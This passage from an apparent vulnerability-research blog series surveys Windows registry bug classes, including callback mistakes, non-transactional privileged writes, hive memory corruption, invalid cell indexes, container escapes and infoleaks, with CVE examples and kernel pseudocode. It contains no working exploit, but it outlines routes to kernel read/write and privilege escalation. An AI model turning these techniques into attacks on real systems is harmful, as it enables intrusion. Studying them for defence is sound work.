    • Issues arising from using the older API version, CmCallbackGetKeyObjectID, instead of the newer CmCallbackGetKeyObjectIDEx. The older version has some inherent problems discussed in the documentation, such as returning an outdated key path if the key name has been changed by an NtRenameKey operation.
    • Issues stemming from an overreliance on the CmCallbackGetKeyObjectID(Ex) function to retrieve a key's full path. A local user can cause these functions to deterministically fail by creating and operating on a key with a path length exceeding 65535 bytes (the maximum length of a string represented by the UNICODE_STRING structure). This can be achieved using the key renaming trick described in CVE-2022-37990, and results in the CmCallbackGetKeyObjectID(Ex) function returning the STATUS_INSUFFICIENT_RESOURCES error code. This is problematic because the documentation for this function does not mention this error code, and there is no way to defend against it from the callback's perspective. The only options are to avoid relying on retrieving the full key path altogether, or to implement a defensive fallback plan if this operation fails.
    • Logical bugs arising from attempts to block access to certain registry keys by path, but neglecting the key rename operation, which can change the key's name dynamically and bypass potential filtering logic in the handling of the open/create operations. Notably, it's difficult to blame developers for such mistakes, as even the official documentation discourages handling NtRenameKey operations, citing its high complexity (quote: "Several registry system calls are not documented because they are rarely used [...]").

    As we can see, developers using these types of callbacks can fall into many traps, and the probability of introducing a bug increases with the complexity of the callback's logic.

    As a security researcher, there are two approaches to enumerating this attack surface to find vulnerable callbacks: static and dynamic. The static approach involves searching the file system (especially C:\Windows\system32\drivers) for the "CmRegisterCallback" string, as every driver that registers a callback must refer to this function or its "Ex" equivalent. As for the dynamic approach, the descriptors of all callbacks in the system are linked together in a doubly-linked list that begins in the global nt!CallbackListHead object. Although the structure of these descriptors is undocumented, my analysis indicates that the pointer to the callback function is located at offset 0x28 in Windows 11. Therefore, all callbacks registered in the system at a given moment can be listed using the following WinDbg command:

    0: kd> !list -x "dqs @$extret+0x28 L1" CallbackListHead

    fffff801`c42f6cd8  fffff801`c42f6cd0 nt!CmpPreloadedHivesList

    ffffdc88`d377e418  fffff801`56a48df0 WdFilter!MpRegCallback

    ffffdc88`d8610b38  fffff801`59747410 applockerfltr!SmpRegistryCallback

    ffffdc88`d363e118  fffff801`57a05dd0 UCPD+0x5dd0

    ffffdc88`ed11d788  fffff801`c3c2ba50 nt!VrpRegistryCallback

    ffffdc88`d860c758  fffff801`597510c0 bfs!BfsRegistryCallback


    As shown, even on a clean Windows 11 system, the operating system and its drivers register a substantial number of callbacks. In the listing above, the first line of output can be ignored, as it refers to the nt!CallbackListHead object, which is the beginning of the list and not a real callback descriptor. The remaining functions are associated with the following modules:

    • WdFilter!MpRegCallback: a callback registered by Windows Defender, the default antivirus engine running on Windows.
    • applockerfltr!SmpRegistryCallback: a callback registered by the Smartlocker Filter Driver, which is one of the drivers that implement the AppLocker/SmartLocker functionality at the kernel level.
    • UCPD+0x5dd0: a callback associated with the UCPD.sys driver, which expands to "User Choice Protection Driver". This is a module that prevents third-party software from modifying the default application settings for certain file types and protocols, such as web browsers and PDF readers. As we can infer from the format of this symbol and its unresolved name, Microsoft does not currently provide PDB debug symbols for the executable image, but some information online indicates that such symbols were once available for older builds of the driver.
    • nt!VrpRegistryCallback: a callback implemented by the VRegDriver, which is part of the core Windows kernel executable image, ntoskrnl.exe. It plays a crucial role in the system, as it is responsible for redirecting key references to their counterparts within differencing hives for containerized processes. It is likely the most interesting and complex callback registered by default in Windows.
    • bfs!BfsRegistryCallback: the callback is a component of the Brokering File System driver. It is primarily responsible for supporting secure file access for applications running in an isolated environment (AppContainers). However, it also has a relatively simple registry callback that supports key opening/creation operations. It is not entirely clear why the functionality wasn't simply incorporated into the VrpRegistryCallback, which serves a very similar purpose.

    In my research, I primarily focused on reviewing the callback invocations in individual registry operations (specifically calls to the CmpCallCallBacksEx function), and on the correctness of the VrpRegistryCallback function implementation. As a result, I discovered CVE-2023-38141 in the former area, and three further bugs in the VRegDriver (CVE-2023-38140, CVE-2023-36803 and CVE-2023-36576). These reports serve as a very good example of the many types of problems that can occur in registry callbacks.

    Privileged registry clients: programs and drivers

    The final attack target related to the registry are the highly privileged users of this interface, that is, user-mode processes running with administrator/system rights, and kernel drivers that operate on the registry. The registry is a shared resource by design, and apart from app hives mounted in the special \Registry\A key, every program in the system can refer to any active key as long as it has the appropriate permissions. And for a malicious user, this means that they can try to exploit weaknesses exhibited by other processes when interacting with the registry, and secondly, they can try to actively interfere with them. I can personally imagine two main types of issues related to incorrect use of the registry, and both of them are quite high-level by nature.

    The first concern is related to the fact that the registry, as a part of the NT Object Manager model, undergoes standard access control through security access checks. Each registry key is mandatorily assigned a specific security descriptor. Therefore, as the name implies, it is crucial for system security that each key's descriptor has the minimum permissions required for proper functionality, while aligning with the author's intended security model for the application.

    From a technical perspective, a specific security descriptor for a given key can be set either during its creation through the lpSecurityAttributes argument of RegCreateKeyExW, or separately by calling the RegSetKeySecurity API. If no descriptor is explicitly set, the key assumes a default descriptor based largely on the security settings of its parent key. This model makes sense from a practical standpoint. It allows most applications to avoid dealing with the complexities of custom security descriptors, while still maintaining a reasonable level of security, as high-level keys in Windows typically have well-configured security settings. Consider the well-known HKLM\Software tree, where Win32 applications have stored their global settings for many years. The assumption is that ordinary users have read access to the global configuration within that tree, but only administrators can write to it. If an installer or application creates a new subkey under HKLM\Software without explicitly setting a descriptor, it inherits the default security properties, which is sufficient in most cases.

    However, certain situations require extra care to properly secure registry keys. For example, if an application stores highly sensitive data (e.g., user passwords) in the registry, it is important to ensure that both read and write permissions are restricted to the smallest possible group of users (e.g., administrators only). Additionally, when assigning custom security descriptors to keys in global system hives, you should exercise caution to avoid inadvertently granting write permissions to all system users. Furthermore, if a user has KEY_CREATE_LINK access to a global key used by higher-privileged processes, they can create a symbolic link within it, potentially resulting in a "confused deputy" problem and the ability to create registry keys under any path. In summary, for developers creating high-privilege code on Windows and utilizing the registry, it is essential to carefully handle the security descriptors of the keys they create and operate on. From a security researcher's perspective, it could be useful to develop tooling to list all keys that allow specific access types to particular groups in the system and run it periodically on different Windows versions and configurations. This approach can lead to some very easy bug discoveries, as it doesn't require any time spent on reverse engineering or code auditing.

    The second type of issue is more subtle and arises because a single "configuration unit" in the registry sometimes consists of multiple elements (keys, values) and must be modified atomically to prevent an inconsistent state and potential vulnerabilities.  For such cases, there is support for transactions in the registry. If a given process manages a configuration that is critical to system security and in which different elements must always be consistent with each other, then making use of the Transacted Registry (TxR) is practically mandatory. A significantly worse, though somewhat acceptable solution may be to implement a custom rollback logic, i.e., in the event of a failure of some individual operation, manually reversing the changes that have been applied so far. The worst case scenario is when a privileged program does not realize the seriousness of introducing partial changes to the registry, and implements its logic in a way typical of using the API in a best-effort manner, i.e.: calling Win32 functions as long as they succeed, and when any of them returns an error, then simply passing it up to the caller without any additional cleanup.

    Let's consider this bug class on the example of a hypothetical service that, through some local inter-process communication interface, allows users to register applications for startup. It creates a key structure under the HKLM\Software\CustomAutostart\<Application Name> path, and for each such key it stores two values: the command line to run during system startup ("CommandLine"), and the username with whose privileges to run it ("UserName"). If the username value does not exist, it implicitly assumes that the program should start with system rights. Of course, the example service intends to be secure, so it only allows setting the username to the one corresponding to the security token of the requesting process. Operations on the registry take place in the following order:

    1. Create a new key named HKLM\Software\CustomAutostart\<Application Name>,
    2. Set the "CommandLine" value to the string provided by the client,
    3. Set the "UserName" value to the string provided by the client.

    The issue with this logic is that it's not transactional – if an error occurs, the execution simply aborts, leaving the partial state behind. For example, if operation #3 fails for any reason, an entry will be added to the autostart indicating that a controlled path should be launched with system rights. This directly leads to privilege escalation and was certainly not the developer's intention. One might wonder why any of these operations would fail, especially in a way controlled by an attacker. The answer is simple and was explained in the "Susceptibility to mishandling OOM conditions" section. A local attacker has at least two ways of influencing the success or failure of registry operations in the system: by filling the space of the hive they want to attack (if they have write access to at least one of its keys) or by occupying the global registry quota in memory, represented by the global nt!CmpGlobalQuota variable. Unfortunately, finding such vulnerabilities is more complicated than simply scanning the entire registry for overly permissive security descriptors. It requires identifying candidates of registry operations in the system that have appropriate characteristics (high privilege process, lack of transactionality, sensitivity to a partial/incomplete state), and then potentially reverse-engineering the specific software to get a deeper understanding of how it interacts with the registry. Tools like Process Monitor may come in handy at least in the first part of the process.

    One example of a vulnerability related to the incorrect guarantee of atomicity of system-critical structures is CVE-2024-26181. As a result of exhausting the global registry quota, it could lead to permanent damage to the HKLM\SAM hive, which stores particularly important information about users in the system, their passwords, group memberships, etc.

    Vulnerability primitives

    In this chapter, we will focus on classifying registry vulnerabilities based on the primitives they offer, and briefly discuss their practical consequences and potential exploitation methods.

    Pool memory corruption

    Pool memory corruption is probably the most common type of low-level vulnerability in the Windows kernel. In the context of the registry, this bug class is somewhat rarer than in other ring-0 components, but it certainly still occurs and is entirely possible. It manifests in its most "pure" form when the corruption happens within an auxiliary object that is temporarily allocated on the pools to implement a specific operation. One such example case is a report concerning three vulnerabilities—CVE-2022-37990, CVE-2022-38038, and CVE-2022-38039—all stemming from a fairly classic 16-bit integer overflow when calculating the length of a dynamically allocated buffer. Another example is CVE-2023-38154, where the cause of the buffer overflow was slightly more intricate and originated from a lack of error handling in one of the functions responsible for recovering the hive state from LOG files.

    The second type of pool memory corruption that can occur in the registry is problems managing long-lived objects that are used to cache some information from the hive mapping in more readily accessible pool memory — such as those described in post #6. In this case, we are usually dealing with UAF-type conditions, like releasing an object while there are still some active references to it. If I had to point to one object that could be most prone to this type of bug, it would probably be the Key Control Block, which is reference counted, used by the implementation of almost every registry syscall, and for which there are some very strong invariants critical for memory safety (e.g., the existence of only one KCB for a particular key in the global KCB tree). One issue related to KCBs was CVE-2022-44683, which resulted from incorrect handling of predefined keys in the NtNotifyChangeMultipleKeys system call.

    Another, slightly different category of UAFs on pools are situations in which this type of condition is not a direct consequence of a vulnerability, but more of a side effect. Let's take security descriptors as an example: they are located in the hive space, but the kernel also maintains a cache reflecting the state of these descriptors on the kernel pools (in _CMHIVE.SecurityCache and related fields). Therefore, if for some reason a security descriptor in the hive is freed prematurely, this problem will also be automatically reflected in the cache, and some keys may start to have a dangling KCB.CachedSecurity pointer set to the released object. I have taken advantage of this fact many times in my reports to Microsoft, because it was very useful for reliably triggering crashes. While generating a bugcheck based on the UAF of the _CM_KEY_SECURITY structure in the hive is possible, it is much more convoluted than simply turning on the Special Pool mechanism and making the kernel refer to the cached copy of the security descriptor (a few examples: CVE-2023-23421, CVE-2023-35382, CVE-2023-38139). In some cases, exploiting memory corruption on pools may also offer some advantages over exploiting hive-based memory corruption, so it is definitely worth remembering this behavior for the future.

    When it comes to the strictly technical aspects of kernel pool exploitation, I won't delve into it too deeply here. I didn't specifically focus on it in my research, and there aren't many interesting registry-specific details to mention in this context. If you are interested to learn more about this topic, please refer to the resources available online.

    Hive memory corruption

    The second type of memory corruption encountered in the registry is hive-based memory corruption. This class of bugs is unique to the registry and is based on the fact that data stored in hives serves a dual role. It stores information persistently on disk, but it also works as the representation of the hive in memory in the exact same form. The data is then operated on using C code through pointers, helper functions like memcpy, and so on. Given all this, it doesn't come as a surprise that classic vulnerabilities such as buffer overflows or use-after-free can also occur within this region.

    So far, during my research, I have managed to find 17 hive-based memory corruption issues, which constitutes approximately 32% of all 53 vulnerabilities that have been fixed by Microsoft in security bulletins. The vast majority of them were related to just two mechanisms – reference counting security descriptors and operating on subkey lists – but there were also cases of bugs related to other types of objects.

    I have started using the term "inconsistent hive state", referring to any situation where the regf format state either ceases to be internally consistent or stops accurately reflecting cached copies of the same data within other kernel objects. I described one such issue here, where the _CM_BIG_DATA.Count field stops correctly corresponding to the _CM_KEY_VALUE.DataLength field for the same registry value. However, despite this specific behavior being incorrect, according to both my analysis and Microsoft's, it doesn't have any security implications for the system. In this context, the term "hive-based memory corruption" denotes a slightly narrower group of issues that not only allow reaching any inconsistent state but specifically enable overwriting valid regf structures with attacker-controlled data.

    The general scheme for exploiting hive-based memory corruption closely resembles the typical exploitation of any other memory corruption. The attacker's initial objective is to leverage the available primitive and manipulate memory allocations/deallocations to overwrite a specific object in a controlled manner. On modern systems, achieving this stage reliably within the heap or kernel pools can be challenging due to allocator randomization and enforced consistency checks. However, the cell allocator implemented by the Windows kernel is highly favorable for the attacker: it lacks any safeguards, and its behavior is entirely deterministic, which greatly simplifies this stage of exploit development. One could even argue that, given the properties of this allocator, virtually any memory corruption primitive within the regf format can be transformed into complete control of the hive in memory with some effort.

    With this assumption, let's consider what to do next. Even if we have absolute control over all the internal data of the mapped hive, we are still limited to its mapping in memory, which in itself does not give us much. The question arises as to how we can "escape" from this memory region and use hive memory corruption to overwrite something more interesting, like an arbitrary address in kernel memory (e.g., the security token of our process).

    First of all, it is worth noting that such an escape is not always necessary – if the attack is carried out in one of the system hives (SOFTWARE, SYSTEM, etc.), we may not need to corrupt the kernel memory at all. In this case, we could simply perform a data-only attack and modify some system configuration, grant ourselves access to important system keys, etc. However, with many bugs, attacking a highly privileged hive is not possible. Then, the other option available to the attacker is to modify one of the cells to break some invariant of the regf format, and cause a second-order side effect in the form of a kernel pool corruption. Some random ideas are:

    • Setting too long a key name or inserting the illegal character '\' into the name,
    • Creating a fake exit node key,
    • Corrupting the binary structure of a security descriptor so that the internal APIs operating on them start misbehaving,
    • Crafting a tree structure within the hive with a depth greater than the maximum allowed (512 levels of nesting),
    • ... and many, many others.

    However, during experiments exploring practical exploitation, I discovered an even better method that grants an attacker the ability to perform reliable arbitrary read and write operations in kernel memory—the ultimate primitive. This method exploits the behavior of 32-bit cell index values, which exhibit unusual behavior when they exceed the hive's total size. I won't elaborate on the full technique here, but for those interested, I discussed it during my presentation at the OffensiveCon conference in May 2024. The subject of exploiting hive memory corruption will be also covered in detail in its own dedicated blog post in the future.

    Invalid cell indexes

    This is a class of bugs that manifests directly when an incorrect cell index appears in an object—either in a cell within the hive or in a structure on kernel pools, like KCB. These issues can be divided into three subgroups, depending on the degree of control an attacker can gain over the cell index.

    Cell index 0xFFFFFFFF (HCELL_NIL)

    This is a special marker that indicates that a given structure member/variable of type HCELL_INDEX doesn't point to any specific cell, which is equivalent to a NULL pointer in C. There are many situations where the value 0xFFFFFFFF (in other words, -1) is used and even desired, e.g. to signal that an optional object doesn't exist and shouldn't be processed. The kernel code is prepared for such cases and correctly checks whether a given cell index is equal to this marker before operating on it. However, problems can arise when the value ends up in a place where the kernel always expects a valid index. Any mandatory field in a specific object can be potentially subject to this problem, such as the _CM_KEY_NODE.Security field, which must always point to a valid descriptor and should never be equal to -1 (other than for exit nodes).

    Some examples of such vulnerabilities include:

    • CVE-2023-21772: an unexpected value of -1 being set in _CM_KEY_NODE.Security due to faulty logic in the registry virtualization code, which first freed the old descriptor and only then attempted to allocate a new one, which could fail, leaving the key without any assigned security descriptor.
    • CVE-2023-35357: an unexpected value of -1 being set in KCB.KeyCell, because the code assumed that it was operating on a physically existing base key, while in practice it could operate on a layered key with Merge-Unbacked semantics, which does not have its own key node, but relies solely on key nodes at lower levels of the key stack.
    • CVE-2023-35358: another case of an unexpected value of -1 being set in KCB.KeyCell, while the kernel expected that at least one key in the given key node stack would have an allocated key node object. The source of the problem here was incorrect integration of transactions and differencing hives.

    When such a problem occurs, it always manifests by the value -1 being passed as the cell index to the HvpGetCellPaged function. For decades, this function completely trusted its parameters, assuming that the input cell index would always be within the bounds of the given hive. Consequently, calling HvpGetCellPaged with a cell index of 0xFFFFFFFF would result in the execution of the following code:

    _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {

      _HMAP_ENTRY *Entry = &Hive->Storage[1].Map->Directory[0x3FF]->Table[0x1FF];

      return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + 0xFFF + 4;

    }


    In other words, the function would refer to the Volatile (1) map cell, and within it, to the last element of the Directory and then the Table arrays. Considering the "small dir" optimization described in post #6, it becomes clear that this cell map walk could result in an out-of-bounds memory access within the kernel pools (beyond the boundaries of the _CMHIVE structure). Personally, I haven't tried to transform this primitive into anything more useful, but it seems evident that with some control over the kernel memory around _CMHIVE, it should theoretically be possible to get the HvpGetCellPaged function to return any address chosen by the attacker. Further exploitation prospects would largely depend on the subsequent operations that would be performed on such a fake cell, and the extent to which a local user could influence them. In summary, I've always considered these types of bugs as "exploitable on paper, but quite difficult to exploit in practice."

    Ultimately, none of this matters much, because it seems that Microsoft noticed a trend in these vulnerabilities and, in July 2023, added a special condition to the HvpGetCellFlat and HvpGetCellPaged functions:

      if (Index == HCELL_NIL) {

        KeBugCheckEx(REGISTRY_ERROR, 0x32, 1, Hive, 0xFFFFFFFF);
     
    }


    This basically means that the specific case of index -1 has been completely mitigated, since rather than allowing any chance of exploitation, the system now immediately shuts down with a Blue Screen of Death. As a result, the bug class no longer has any security implications. However, I do feel a bit disappointed – if Microsoft deemed the check sufficiently important to add to the code, they could have made it just a tiny bit stronger, for example:

      if ((Index & 0x7FFFFFFF) >= Hive->Storage[Index >> 31].Length) {

        KeBugCheckEx(...);

      }


    The above check would reject all cell indexes exceeding the length of the corresponding storage type, and it is exactly what the HvpReleaseCellPaged function currently does. Checking this slightly stronger condition in one fell swoop would handle invalid indexes of -1 and completely mitigate the previously mentioned technique of out-of-bounds cell indexes. While not introduced yet, I still secretly hope that it will happen one day... 🙂

    Dangling (out-of-date) cell indexes

    Another group of vulnerabilities related to cell indexes are cases where, after a cell is freed, its index remains in an active cell within the registry. Simply put, these are just the cell-specific use-after-free conditions, and so the category very closely overlaps with the previously described hive-based memory corruption.

    Notable examples of such bugs include:

    • CVE-2022-37988: Caused by the internal HvReallocateCell function potentially failing when shrinking an existing cell, which its caller assumed was impossible.
    • CVE-2023-23420: A bug in the transactional key rename operation could lead to a dangling cell index in a key's subkey list, pointing to a freed key node.
    • CVE-2024-26182: Caused by mishandling a partial success situation where an internal function might successfully perform some operations on the hive (reallocate existing subkey lists) but ultimately return an error code, causing the caller to skip updating the _CM_KEY_NODE.SubKeyLists[...] field accordingly.
    • All use-after-free vulnerabilities in security descriptors due to incorrect reference counting: CVE-2022-34707, CVE-2023-28248, CVE-2023-35356, CVE-2023-35382, CVE-2023-38139, and CVE-2024-43641.

    In general, UAF bugs within the hive are powerful primitives that can typically be exploited to achieve total control over the hive's internal data. The fact that both exploits I wrote to demonstrate practical exploitation of hive memory corruption vulnerabilities fall into this category (CVE-2022-34707, CVE-2023-23420) can serve as anecdotal evidence of this statement.

    Fully controlled/arbitrary cell indexes

    The last type of issues where cell indexes play a major role are situations in which the user somehow obtains full control over the entire 32-bit index value, which is then referenced as a valid cell by the kernel. Notably, this is not about some second-order effect of hive memory corruption, but vulnerabilities where this primitive is the root cause of the problem. Such situations happen relatively rarely, but there have been at least two such cases in the past:

    • CVE-2022-34708: missing verification of the _CM_KEY_SECURITY.Blink field in the CmpValidateHiveSecurityDescriptors function for the root security descriptor in the hive,
    • CVE-2023-35356: referencing the _CM_KEY_NODE.ValueList.List field in a predefined key, in which the ValueList structure has completely different semantics, and its List field can be set to an arbitrary value.

    Given that the correctness of cell indexes is a fairly obvious requirement known to Microsoft kernel developers, they pay close attention to verifying them thoroughly. For this reason, I think that the chance we will have many more such bugs in the future is slim. As for their exploitation, they may seem similar in nature to the way hive memory corruption can be exploited with out-of-bounds cell indexes, but in fact, these are two different scenarios. With hive-based memory corruption, we can dynamically change the value of a cell index multiple times as needed, and here, we would only have one specific 32-bit value at our disposal. If, in a hypothetical vulnerability, some interesting operations were performed on such a controlled index, I would probably still reduce the problem to the typical UAF case, try to obtain full binary control over the hive, and continue from there.

    Low-level information disclosure (memory, pointers)

    Since the registry code is written in C and operates with kernel privileges, and additionally has not yet been completely rewritten to use zeroing ExAllocatePool functions, it is natural that it may be vulnerable to memory disclosure issues when copying output data to user-mode. The most canonical example of such a bug was CVE-2023-38140, where the VrpPostEnumerateKey function (one of the sub-handlers of the VRegDriver registry callback) allocated a buffer on kernel pools with a user-controlled length, filled it with some amount of data – potentially less than the buffer size – and then copied the entire buffer back to user mode, including uninitialized bytes at the end of the allocation.

    However, besides this typical memory disclosure scenario, it is worth noting two more things in the context of the registry. One of them is that, as we know, the registry operates not only on memory but also on various files on disk, and therefore the filesystem becomes another type of data sink where data leakage can also occur. And so, for example, in CVE-2022-35768, kernel pool memory could be disclosed directly to the hive file due to an out-of-bounds read vulnerability, and in CVE-2023-28271, both uninitialized data and various kernel-mode pointers were leaked to KTM transaction log files.

    The second interesting observation is that the registry implementation does not have to be solely the source of the data leak, but can also be just a medium through which it happens. There is a certain group of keys and values that are readable by ordinary users and initialized with binary data by the kernel and drivers using ZwSetValueKey and similar functions. Therefore, there is a risk that some uninitialized data may leak through this channel, and indeed during my Bochspwn Reloaded research in 2018, I identified several instances of such leaks, such as CVE-2018-0898, CVE-2018-0899, and CVE-2018-0900.

    Broken security guarantees, API contracts and common sense assumptions

    Besides maintaining internal consistency and being free of low-level bugs, it's also important that the registry behaves logically and predictably, even under unusual conditions. It must adhere to the overall security model of Windows NT, operate in accordance with its public documentation, and behave in a way that aligns with common sense expectations. Failure to do so could result in various problems in the client software that interacts with it, but identifying such deviations from expected behavior can be challenging, as it requires deep understanding of the interface's high-level principles and the practical implications of violating them.

    In the following subsections, I will discuss a few examples of issues where the registry's behavior was inconsistent with documentation, system architecture, or common sense.

    Security access rights enforcement

    The registry implementation must enforce security checks, meaning it must verify appropriate access rights to a key when opening it, and then again when performing specific operations on the obtained handle. Generally, the registry manages this well in most cases. However, there were two bugs in the past that allowed a local user to perform certain operations that they theoretically didn't have sufficient permissions for:

    • CVE-2023-21750: Due to a logic bug in the CmKeyBodyRemapToVirtual function (related to registry virtualization), it was possible to delete certain keys within the HKLM\Software hive with only KEY_READ and KEY_SET_VALUE rights, without the normally required DELETE right.
    • CVE-2023-36404: In this case, it was possible to gain access to the values of certain registry keys despite lacking appropriate rights. The attack itself was complex and required specific circumstances: loading a differencing hive overlaid on a system hive with a specially crafted key structure, and then having a system component create a secret key in that system hive. Because of the fact that the handle to the layered key would be opened earlier (and the security access check would be performed at that point in time), creating a new key at a lower level with more restricted permissions wouldn't be considered later, leading to potential information disclosure.

    As shown, both these bugs were directly related to incorrect or missing permissions verification, but they weren't particularly attractive in terms of practical attacks. A much more appealing bug was CVE-2019-0881, discovered in registry virtualization a few years earlier by James Forshaw. That vulnerability allowed unprivileged users to read every registry value in the system regardless of the user's privileges, which is about as powerful as a registry infoleak can get.

    Confused deputy problems with predefined keys

    Predefined keys probably don't need any further introduction at this point in the series. In this specific case of the confused deputy problem, the bug report for CVE-2023-35633 captures the essence of the issue well: if a local attacker had binary control over a hive, they could cause the use of an API like RegOpenKeyExW on any key within that hive to return one of the predefined pseudo-handles like HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER, etc., instead of a normal handle to that key. This behavior was undocumented and unexpected for developers using registry in their code. Unsurprisingly, finding a privileged process that did something interesting on a user-controlled hive wasn't that hard, and it turned out that there was indeed a service in Windows that opened a key inside the HKCU of each logged-in user, and recursively set permissive access rights on that key. By abusing predefined handles, it was possible to redirect the operation and grant ourselves full access to one of the global keys in the system, leading to a fairly straightforward privilege escalation. If you are interested in learning more about the bug and its practical exploitation, please refer to my Windows Registry Deja Vu: The Return of Confused Deputies presentation from CONFidence 2024. In many ways, this attack was a resurrection of a similar confused deputy problem, CVE-2010-0237, which I had discovered together with Gynvael Coldwind. The main difference was that at that time, the redirection of access to keys was achieved via symbolic links, a more obvious and widely known mechanism.

    Atomicity of KTM transactions

    The main feature of any transaction implementation is that it should guarantee atomicity – that is, either apply all changes being part of the transaction, or none of them. Imagine my surprise then, when I discovered that the registry transaction implementation integrated with the KTM did not guarantee atomicity at all, but merely tried really hard to maintain it. The main problem was that it wasn't designed to handle OOM errors (for example, when a hive was completely full) and, as a result, when such a problem occurred in the middle of committing a transaction, there was no good way to reverse the changes already applied. The Configuration Manager falsely returned a success code to the caller, while retrying to commit the remaining part of the transaction every 30 seconds, hoping that some space would free up in the registry in the meantime, and the operations would eventually succeed. This type of behavior obviously contradicted both the documentation and common sense about how transactions should work.

    I reported this issue as CVE-2023-32019, and Microsoft fixed it by completely removing a large part of the code that implemented this functionality, as it was simply impossible to fix correctly without completely redesigning it from scratch. Fortunately, in Windows 10, an alternative transaction implementation for the registry called lightweight transactions was introduced, which was designed correctly and did not have the same problem. As a result, a decision was made to internally redirect the handling of KTM transactions within the Windows kernel to the same engine that is responsible for lightweight transactions.

    Containerized registry escapes

    The general goal of differencing hives and layered keys is to implement registry containerization. This mechanism creates an isolated registry view for a specific group of processes, without direct access to the host registry (a sort of "chroot" for the Windows registry). Unfortunately, there isn't much official documentation on this topic, and it's particularly difficult to find information on whether this type of containerization is a Microsoft-supported security boundary that warrants fixes in the monthly security bulletins. I think it is reasonable to expect that since the mechanism is used to isolate the registry in well supported use-cases (such as running Docker containers), it should ideally not be trivial to bypass, but I was unable to find any official statement to support or refute this assumption.

    When I looked further into it, I discovered that the redirection of registry calls within containerized environments was managed by registry callbacks, specifically one called VrpRegistryCallback. While callbacks do indeed seem well suited for this purpose, the devil is in the details – specifically, error handling. I found at least two ways a containerized application could trigger an error during the execution of the internal VrpPreOpenOrCreate/VrpPostOpenOrCreate handlers. This resulted in exiting the callback prematurely while an important part of the redirection logic still hadn't been executed, and consequently led to the process gaining access to the host's registry view. Additionally, I found that another logical bug allowed access to the host's registry through differencing hives associated with other active containers in the system.

    As I mentioned, I wasn't entirely clear on the state of Microsoft's support for this mechanism, but luckily I didn't have to wonder for too long. It turned out that James Forshaw had a similar dilemma and managed to reach an understanding with the vendor on the matter, which he described in his blog post.

    After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable.

    [...]

    Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege.


    Eventually, I reported all three bugs in one report, and Microsoft fixed them shortly after as CVE-2023-36576. I particularly like the first issue described in the report (the bug in VrpBuildKeyPath), as it makes a very interesting example of how a theoretically low-level issue like a 16-bit integer overflow can have the high-level consequences of a container escape, without any memory corruption being involved.

    Adherence to official key and value name length limits

    The constraints on the length of key and value names are quite simple. Microsoft defines the maximum values on a dedicated documentation page called Registry Element Size Limits:

    Registry element

    Size limit

    Key name

    255 characters. The key name includes the absolute path of the key in the registry, always starting at a base key, for example, HKEY_LOCAL_MACHINE.

    Value name

    16,383 characters. Windows 2000: 260 ANSI characters or 16,383 Unicode characters.

    Admittedly, the way this is worded is quite confusing, and I think it would be better if the information in the second column simply ended after the first period. As it stands, the explanation for "key name" seems to suggest that the 255-character limit applies to the entire key path relative to the top-level key. In reality, the limit of 255 (or to be precise, 256) characters applies to the individual name of each registry key, and value names are indeed limited to 16,383 characters. These assumptions are the basis for the entire registry code.

    Despite these being fundamental and documented values, it might be surprising that the requirements weren't correctly verified in the hive loading code until October 2022. Specifically, it was possible to load a hive containing a key with a name of up to 1040 characters. Furthermore, the length of a value's name wasn't checked at all, meaning it could consist of up to 65535 characters, which is the maximum value of the uint16 type representing its length. In both cases, it was possible to exceed the theoretical limits set by the documentation by more than four times.

    I reported these bugs as part of the CVE-2022-37991 report. On a default Windows installation, I found a way to potentially exploit (or at least trigger a reproducible crash) the missing check for the value name length, but I couldn't demonstrate the consequences of an overly long key name. Nevertheless, I'm convinced that with a bit more research, one could find an application or driver implementing a registry callback that assumes key names cannot be longer than 255 characters, leading to a buffer overflow or other memory corruption. This example clearly shows that even the official documentation cannot be trusted, and all assumptions, even the most fundamental ones, must be verified directly in the code during vulnerability research.

    Creation of stable keys under volatile ones

    Another rational behavior of the registry is that it doesn't allow you to create Stable keys under Volatile parent keys. This makes sense, as stable keys are stored on disk and persist through hive unload and system reboot, whereas volatile keys only exist in memory and vanish when the hive is unloaded. Consequently, a stable key under a volatile one wouldn't be practical, as its parent would disappear after a restart, severing its path to the registry tree root, causing the stable key to disappear as well. Therefore, under normal conditions, creating such a key is impossible, and any attempts to do so results in the  ERROR_CHILD_MUST_BE_VOLATILE error being returned to the caller. While there's no official mention of this in the documentation (except for a brief description of the error code), Raymond Chen addressed it on his blog, providing at least some documentation of this behavior.

    During my research, I discovered two ways to bypass this requirement and create stable keys under volatile ones. These were issues CVE-2023-21748 and CVE-2024-26173, where the first one was related to registry virtualization, and the second to transaction support. Interestingly, in both of these cases, it was clear that a certain invariant in the registry design was being broken, but it was less clear whether this could have any real consequences for system security. After spending some time on analysis, I came to the conclusion that there was at least a theoretical chance of some security impact, due to the fact that security descriptors of volatile keys are not linked together into a global linked list in the same way stable security descriptors are. Long story short, if later in time some other stable keys in the hive started to share the security descriptor of the stable-under-volatile one, then their security would become invalidated and forcibly reset to their parent's descriptor on the next system reboot, violating the security model of the registry. Microsoft apparently shared my assessment of the situation, as they decided to fix both bugs as part of a security bulletin. Still, this is an interesting illustration of the complexity of the registry – sometimes finding an anomaly in the kernel logic can generate some kind of inconsistent state, but its implications might not be clear without further, detailed analysis.

    Arbitrary key existence information leak

    If someone were to ask me whether an unprivileged user should be able to check for the existence of a registry key without having any access rights to that key or its parent in a secure operating system, I would say absolutely not. However, this is possible on Windows, because the code responsible for opening keys first performs a full path lookup, and only then checks the access rights. This allows for differentiation between existing keys (return value STATUS_ACCESS_DENIED) and non-existing keys (return value STATUS_OBJECT_NAME_NOT_FOUND).

    After discovering this behavior, I decided to report it to Microsoft in December 2023. The vendor's response was that it is indeed a bug, but its severity is not high enough to be fixed as an official vulnerability. I somewhat understand this interpretation, as the amount of information that can be disclosed in this way is quite low (i.e. limited configuration elements of other users), and fixing the issue would probably involve significant code refactoring and a potential performance decrease.  It's also difficult to say whether this type of boundary is properly defensible, because after one fix it might turn out that there are many other ways to leak this type of information. Therefore, the technique described in my report still works at the time of writing this blog post.

    Miscellaneous

